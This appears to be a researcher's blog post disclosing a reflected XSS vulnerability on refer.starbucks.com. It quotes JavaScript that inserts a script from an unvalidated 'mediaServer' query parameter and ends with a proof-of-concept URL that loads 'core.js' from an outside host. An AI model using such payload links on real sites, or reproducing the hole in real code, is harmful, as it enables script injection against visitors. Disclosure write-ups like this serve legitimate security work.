Reflective XSS in refer.starbucks.com

I have found a reflective XSS vulnerability on http://refer.starbucks.com. Below are the details:

  1. Go to http://happymondays.starbucks.com, scroll down and click the „Invite a friend” button. You will be redirected to http://refer.starbucks.com/micro/microsite?source=redirect
  2. On http://refer.starbucks.com/micro/microsite?source=redirect there are three buttons, to „Spread the love„:

SHARE WITH EMAIL

SHARE ON FACEBOOK

SHARE ON TWITTER

Clicking on each of them generates a request like this:

GET /xd-arbiter?mediaServer=http://tags.extole.com&clientId=106223&socketId=facebook_4 HTTP/1.1

Host: refer.starbucks.com

Use of external server should immediately catch your attention – a quick look into the source code reveals a reflective XSS vulnerability:

var MEDIA_SERVER = queryArgs.mediaServer;
var CLIENT_ID = queryArgs.clientId;
var SOCKET_ID = queryArgs.socketId;
(…)
insertScript(MEDIA_SERVER + ‚/’ + CLIENT_ID + ‚/core.js’);

So we have a MEDIA_SERVER („https://lubi.cz„), CLIENT_ID („starbucks” folder), SOCKET_ID (whaterver) and a core.js file („https://lubi.cz/starbucks/core.js” combined). To execute a payload just visit the following link:

http://refer.starbucks.com/xd-arbiter?mediaServer=https://lubi.cz&clientId=starbucks&socketId=1

 

Dodaj komentarz

Twój adres email nie zostanie opublikowany. Pola, których wypełnienie jest wymagane, są oznaczone symbolem *